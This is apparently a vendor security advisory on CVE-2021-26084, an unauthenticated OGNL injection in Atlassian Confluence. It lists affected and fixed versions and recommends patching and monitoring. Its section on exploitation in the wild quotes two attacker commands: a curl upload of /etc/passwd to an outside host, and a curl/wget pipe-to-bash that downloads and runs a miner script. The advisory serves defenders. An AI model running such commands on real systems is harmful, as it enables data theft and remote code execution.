top of page

Critical Vulnerability Alert: CVE-2021-26084 OGNL Injection in Atlassian Confluence Server and Data Center

CVE Image for report on CVE-2021-26084

Executive Summary

CVE-2021-26084 is a critical vulnerability in Atlassian Confluence Server and Data Center, identified as an Object-Graph Navigation Language (OGNL) injection flaw. This vulnerability allows unauthenticated attackers to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerability has a CVSS score of 9.8, indicating its critical nature. The sectors and countries targeted by APT groups exploiting this vulnerability include various industries globally, with a particular focus on North America and Europe.

Technical Information

CVE-2021-26084 arises due to insufficient validation of user input used to set variables evaluated in Velocity templates within single quotes. This allows an attacker to inject OGNL code and execute it under the user privileges which run that server. The affected versions of Confluence Server and Data Center are extensive, covering all 4.x.x, 5.x.x, 6.x.x, and 7.x.x versions up to specific patch levels. The vulnerability is particularly dangerous because it does not require authentication, making it easily exploitable by remote attackers.

The vulnerability has been actively exploited in the wild. Attackers have been observed leveraging this flaw to execute arbitrary code on vulnerable Confluence instances. The exploitation typically involves sending a specially crafted HTTP request to the vulnerable server, which triggers the OGNL injection and allows the attacker to run arbitrary commands. This can lead to a complete compromise of the affected system, allowing attackers to install malware, exfiltrate data, or use the compromised server as a launchpad for further attacks.

Exploitation in the Wild

The exploitation of CVE-2021-26084 has been observed in various real-world attacks. According to Palo Alto Networks, real-life attacks prevented by Cortex XDR include attempts to upload the customer’s passwd files, attempts to directly execute a script that downloads a miner, and interactive reverse shell on the machine. For example, attackers have used commands like

curl -X POST --data-binary @/etc/passwd http://(redacted)[.](redacted)[.]net
to upload sensitive files and
(curl -fsSL http://x[.]x[.]x.[x]:1234/xmss||wget -q -O - http://x[.]x[.]x[.]x:1234/xmss)|bash
to download and execute malicious scripts.

APT Groups using this vulnerability

While specific APT groups exploiting this vulnerability have not been publicly identified, the critical nature of the flaw makes it a likely target for advanced persistent threats. APT groups often target vulnerabilities that allow for remote code execution without authentication, as these provide a high return on investment in terms of access and control over compromised systems. The sectors and countries targeted by these groups include various industries globally, with a particular focus on North America and Europe.

Affected Product Versions

The affected versions of Confluence Server and Data Center are: All 4.x.x versions, All 5.x.x versions, All 6.0.x versions, All 6.1.x versions, All 6.2.x versions, All 6.3.x versions, All 6.4.x versions, All 6.5.x versions, All 6.6.x versions, All 6.7.x versions, All 6.8.x versions, All 6.9.x versions, All 6.10.x versions, All 6.11.x versions, All 6.12.x versions, All 6.13.x versions before 6.13.23, All 6.14.x versions, All 6.15.x versions, All 7.0.x versions, All 7.1.x versions, All 7.2.x versions, All 7.3.x versions, All 7.4.x versions before 7.4.11, All 7.5.x versions, All 7.6.x versions, All 7.7.x versions, All 7.8.x versions, All 7.9.x versions, All 7.10.x versions, All 7.11.x versions before 7.11.6, All 7.12.x versions before 7.12.5.

Workaround and Mitigation

To mitigate this vulnerability, it is crucial to apply the patches provided by Atlassian. The fixed versions are 6.13.23 and later, 7.4.11 and later, 7.11.6 and later, and 7.12.5 and later. Additionally, organizations should monitor for unusual HTTP requests to Confluence endpoints, unexpected processes running on the Confluence server, and unexplained changes to Confluence configuration files. Implementing network segmentation and using web application firewalls can also help in reducing the attack surface.

References

Rescana is here for you

At Rescana, we understand the critical importance of staying ahead of cybersecurity threats. Our Continuous Threat and Exposure Management (CTEM) platform helps organizations identify, assess, and mitigate vulnerabilities like CVE-2021-26084. We provide real-time monitoring, threat intelligence, and automated remediation to ensure your systems remain secure. If you have any questions about this report or any other issue, please contact us at ops@rescana.com. We are here to help you navigate the complex landscape of cybersecurity threats and protect your valuable assets.

0 views0 comments

コメント


bottom of page